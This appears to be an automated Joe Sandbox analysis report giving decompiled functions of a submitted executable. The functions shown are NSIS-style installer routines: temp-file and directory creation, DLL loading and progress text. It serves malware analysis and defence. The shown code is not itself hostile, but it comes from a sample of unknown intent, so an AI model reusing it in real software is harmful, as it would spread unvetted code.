0x00403391
0x00403394
0x00000000
0x00000000
0x0040339a
0x004033a0
0x004033a2
0x004033ab
0x004033ad
0x004033de
0x004033e4
0x004033f0
0x004033f5
0x004033f5
0x004033fa
0x00403435
0x00000000
0x00000000
0x00000000
0x004033fc
0x00403400
0x00403417
0x0040341c
0x0040341f
0x00403422
0x00403425
0x00403429
0x00000000
0x00000000
0x00000000
0x0040342f
0x00403409
0x00403410
0x00000000
0x00000000
0x00403412
0x00000000
0x00403412
0x004033fa
0x0040343d
0x00000000
0x0040343d
0x00000000
0x00403344

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033A2
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033CB
wsprintfW.USER32 ref: 004033DE

Strings

... %d%%, xrefs: 004033D8
Z8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$Z8@
API String ID: 551687249-843941321
Opcode ID: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
Opcode Fuzzy Hash: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040557C Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040557C(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a44;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b14;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406557(_t38, 0, 0x7a0f28, 0x7a0f28, _a4);
					}
					_t27 = lstrlenW(0x7a0f28);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a28, 0x7a0f28); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f28;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f28[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f28, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x00405582
0x0040558c
0x00405591
0x00405597
0x004055a2
0x004055a5
0x004055a8
0x004055ae
0x004055ae
0x004055b4
0x004055bc
0x004055bf
0x004055dc
0x004055e0
0x004055e9
0x004055e9
0x004055f3
0x004055fc
0x00405608
0x0040560f
0x00405613
0x00405616
0x00405629
0x00405637
0x00405637
0x0040563b
0x0040563d
0x00405640
0x00000000
0x00405640
0x004055c1
0x004055c9
0x004055d1
0x004055d7
0x00000000
0x004055d7
0x004055d1
0x004055bf
0x0040564c

APIs

lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637

Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
Opcode Fuzzy Hash: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406877 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406877(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x0040688e
0x00406897
0x00406899
0x00406899
0x0040689d
0x004068b0
0x004068aa
0x004068aa
0x004068aa
0x004068c9
0x004068dd
0x004068e4

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
wsprintfW.USER32 ref: 004068C9
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD

Strings

%s%S.dll, xrefs: 004068C3
\, xrefs: 0040689F
UXTHEME, xrefs: 00406880

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A4B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A4B(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a56
0x00405a5a
0x00405a5d
0x00405a63
0x00405a67
0x00405a6b
0x00405a73
0x00405a7a
0x00405a80
0x00405a87
0x00405a8e
0x00405a96
0x00405a98
0x00000000
0x00405a98
0x00405aa2
0x00405aa9
0x00405abf
0x00000000
0x00000000
0x00000000
0x00405ac1
0x00405ac5

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
GetLastError.KERNEL32 ref: 00405AA2
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
GetLastError.KERNEL32 ref: 00405AC1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3936084776
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9

Uniqueness

Uniqueness Score: -1.00%

Function 732D1817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E732D1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x732d506c = _a8;
				 *0x732d5070 = _a16;
				 *0x732d5074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x732d5048, E732D1651);
				_push(1); // executed
				_t37 = E732D1BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E732D243E(_t54);
					}
					_push(_t54);
					E732D2480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E732D2655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E732D1666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E732D2655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E732D2655();
							_t37 = GlobalFree(E732D1312(E732D1654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E732D2618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E732D15DD( *0x732d5068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E732D2E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E732D2B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E732D2810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x732d1817
0x732d1817
0x732d1817
0x732d1824
0x732d182c
0x732d1839
0x732d1847
0x732d184a
0x732d184c
0x732d1851
0x732d1856
0x732d1978
0x732d1978
0x732d185c
0x732d1860
0x732d1863
0x732d1868
0x732d1869
0x732d186a
0x732d1870
0x732d1876
0x732d18a6
0x732d18ad
0x732d18d1
0x732d191e
0x732d191f
0x732d18d3
0x732d18d3
0x732d18d4
0x732d18dd
0x732d18de
0x732d18e8
0x732d18eb
0x732d18f0
0x732d18f7
0x732d18f7
0x732d18fd
0x732d18fe
0x732d1904
0x732d190a
0x732d1917
0x732d1918
0x732d191b
0x732d18af
0x732d18af
0x732d18b0
0x732d18c5
0x732d18c5
0x732d1929
0x732d192c
0x732d1939
0x732d1940
0x732d1948
0x732d194b
0x732d194b
0x732d1948
0x732d1958
0x732d1960
0x732d1965
0x732d1958
0x732d196d
0x00000000
0x732d196f
0x00000000
0x732d1970
0x732d196d
0x732d187a
0x732d187d
0x732d189b
0x00000000
0x00000000
0x732d189e
0x732d18a3
0x732d18a3
0x732d18a5
0x00000000
0x732d18a5
0x732d187f
0x732d1880
0x732d1888
0x732d1889
0x00000000
0x732d1889
0x732d1882
0x732d1883
0x732d1891
0x00000000
0x732d1891
0x732d1886
0x00000000
0x00000000
0x00000000
0x732d1886

APIs

Part of subcall function 732D1BFF: GlobalFree.KERNEL32 ref: 732D1E74
Part of subcall function 732D1BFF: GlobalFree.KERNEL32 ref: 732D1E79
Part of subcall function 732D1BFF: GlobalFree.KERNEL32 ref: 732D1E7E

GlobalFree.KERNEL32 ref: 732D18C5
FreeLibrary.KERNEL32(?), ref: 732D194B
GlobalFree.KERNEL32 ref: 732D1970

Part of subcall function 732D243E: GlobalAlloc.KERNEL32(00000040,?), ref: 732D246F

Part of subcall function 732D2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,732D1896,00000000), ref: 732D28E0

Part of subcall function 732D1666: wsprintfW.USER32 ref: 732D1694

Strings

, xrefs: 732D1951

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 56b79c3392e8a6a1c9e90bf340656f4db59d639e687123b380990f7f08d3fa6a
Instruction ID: c76040e6b995f7b6b0c7ed404a840f3fbf8bf67e319d70a2e0fe7990f0c4b8be
Opcode Fuzzy Hash: 56b79c3392e8a6a1c9e90bf340656f4db59d639e687123b380990f7f08d3fa6a
Instruction Fuzzy Hash: 8841B871A303469BEB419F74E888BD537ACAF04315F188465ED4B9A8C6DBB8E0C4C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00406039 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406039(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040603f
0x00406045
0x00406046
0x00406046
0x0040604b
0x0040604c
0x0040604f
0x00406054
0x00406057
0x00406061
0x0040606e
0x00406072
0x0040607a
0x00000000
0x00000000
0x0040607e
0x00000000
0x00406080
0x00406080
0x00406080
0x00406083
0x00406086
0x00406086
0x00406089
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406057
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072

Strings

nsa, xrefs: 00406046
C:\Users\user\AppData\Local\Temp\, xrefs: 0040603E

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1857211195
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x7a8b20");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406956(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040557C(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B69( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,76F1EA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

